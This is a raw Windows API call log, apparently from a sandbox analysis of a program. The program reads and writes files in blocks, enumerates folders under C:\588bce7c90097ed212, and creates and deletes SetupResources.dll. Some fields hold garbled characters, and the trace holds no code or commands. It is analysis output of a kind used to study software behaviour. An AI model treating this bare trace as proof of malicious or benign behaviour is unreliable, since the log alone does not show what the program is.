ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.287] WriteFile (in: hFile=0x418, lpBuffer=0x88b38*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.297] GetLastError () returned 0x0 [0071.297] SetLastError (dwErrCode=0x0) [0071.298] GetLastError () returned 0x0 [0071.298] SetLastError (dwErrCode=0x0) [0071.298] GetLastError () returned 0x0 [0071.298] SetLastError (dwErrCode=0x0) [0071.299] GetLastError () returned 0x0 [0071.299] SetLastError (dwErrCode=0x0) [0071.300] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.300] WriteFile (in: hFile=0x418, lpBuffer=0x88b38*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.305] GetLastError () returned 0x0 [0071.305] SetLastError (dwErrCode=0x0) [0071.305] GetLastError () returned 0x0 [0071.310] SetLastError (dwErrCode=0x0) [0071.311] GetLastError () returned 0x0 [0071.311] SetLastError (dwErrCode=0x0) [0071.328] GetLastError () returned 0x0 [0071.328] SetLastError (dwErrCode=0x0) [0071.328] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0071.328] WriteFile (in: hFile=0x418, lpBuffer=0x88b38*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.328] GetLastError () returned 0x0 [0071.328] SetLastError (dwErrCode=0x0) [0071.329] GetLastError () returned 0x0 [0071.329] SetLastError (dwErrCode=0x0) [0071.329] GetLastError () returned 0x0 [0071.329] SetLastError (dwErrCode=0x0) [0071.329] GetLastError () returned 0x0 [0071.329] SetLastError (dwErrCode=0x0) [0071.329] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x558, lpOverlapped=0x0) returned 1 [0071.329] WriteFile (in: hFile=0x418, lpBuffer=0x88b38*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0071.329] GetLastError () returned 0x0 [0071.329] SetLastError (dwErrCode=0x0) [0071.329] ReadFile (in: hFile=0x410, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0071.330] GetLastError () returned 0x0 [0071.330] SetLastError (dwErrCode=0x0) [0071.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0071.330] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0071.330] GetLastError () returned 0x0 [0071.330] SetLastError (dwErrCode=0x0) [0071.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0071.330] WriteFile (in: hFile=0x418, lpBuffer=0x88b38*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesWritten=0x327ef70*=0x560, lpOverlapped=0x0) returned 1 [0071.330] GetLastError () returned 0x0 [0071.330] SetLastError (dwErrCode=0x0) [0071.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.330] GetLastError () returned 0x0 [0071.330] SetLastError (dwErrCode=0x0) [0071.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0071.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0071.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.330] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0071.331] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b38 | out: hHeap=0x20000) returned 1 [0071.331] CloseHandle (hObject=0x418) returned 1 [0071.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0071.332] CloseHandle (hObject=0x410) returned 1 [0071.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0071.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0071.333] AreFileApisANSI () returned 1 [0071.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0071.333] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0071.333] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 46 [0071.333] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.334] GetFileType (hFile=0x410) returned 0x1 [0071.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x88b38 [0071.334] GetLastError () returned 0xb7 [0071.341] SetLastError (dwErrCode=0xb7) [0071.341] WriteFile (in: hFile=0x410, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0071.361] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b38 | out: hHeap=0x20000) returned 1 [0071.361] CloseHandle (hObject=0x410) returned 1 [0071.363] AreFileApisANSI () returned 1 [0071.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0071.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0071.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\SetupResources.dll") returned 46 [0071.363] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1053\\setupresources.dll")) returned 1 [0071.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0071.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0071.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0071.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0071.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0071.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0071.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0071.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0071.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0071.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0071.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0071.389] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0071.390] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.390] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.390] FindNextFileW (in: hFindFile=0x78650, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4f6, ftLastWriteTime.dwHighDateTime=0x1, nFileSizeHigh=0x0, nFileSizeLow=0x28bf8, dwReserved0=0x1, dwReserved1=0x0, cFileName="̮", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧賂̧⺊Ā̧붼聐̧㑍Ā̧虐\x07̧비聐蜠\x08賂̧")) returned 0 [0071.390] FindClose (in: hFindFile=0x78650 | out: hFindFile=0x78650) returned 1 [0071.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0071.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0071.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0071.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0071.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0071.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0071.390] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.390] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0071.390] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.391] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.391] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.391] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.391] AreFileApisANSI () returned 1 [0071.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1055", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1055", lpUsedDefaultChar=0x0) returned 27 [0071.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.391] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.391] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0071.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0071.391] AreFileApisANSI () returned 1 [0071.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0071.391] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78090 [0071.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x78090, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055") returned 27 [0071.391] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055" (normalized: "c:\\588bce7c90097ed212\\1055"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.391] GetLastError () returned 0x5 [0071.391] GetLastError () returned 0x5 [0071.391] SetLastError (dwErrCode=0x5) [0071.391] GetLastError () returned 0x5 [0071.391] SetLastError (dwErrCode=0x5) [0071.391] GetLastError () returned 0x5 [0071.391] SetLastError (dwErrCode=0x5) [0071.391] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78090 | out: hHeap=0x20000) returned 1 [0071.392] AreFileApisANSI () returned 1 [0071.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0071.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78690 [0071.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88720, cbMultiByte=-1, lpWideCharStr=0x78690, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1055") returned 27 [0071.392] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055" (normalized: "c:\\588bce7c90097ed212\\1055"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0071.392] GetLastError () returned 0x5 [0071.392] GetLastError () returned 0x5 [0071.392] SetLastError (dwErrCode=0x5) [0071.392] GetLastError () returned 0x5 [0071.392] SetLastError (dwErrCode=0x5) [0071.392] GetLastError () returned 0x5 [0071.392] SetLastError (dwErrCode=0x5) [0071.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78690 | out: hHeap=0x20000) returned 1 [0071.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0071.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0071.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.392] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0071.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x690d0 [0071.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0071.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0071.392] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0071.392] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="2052", cAlternateFileName="")) returned 1 [0071.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0071.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0071.392] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0071.392] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x780d0 [0071.393] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.393] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0071.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0071.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x716f0 [0071.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0071.393] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0071.393] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0071.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0071.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0071.394] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.394] AreFileApisANSI () returned 1 [0071.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1055\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1055\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0071.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0071.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.394] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0071.394] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0071.394] AreFileApisANSI () returned 1 [0071.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0071.394] RtlAllocateHeap 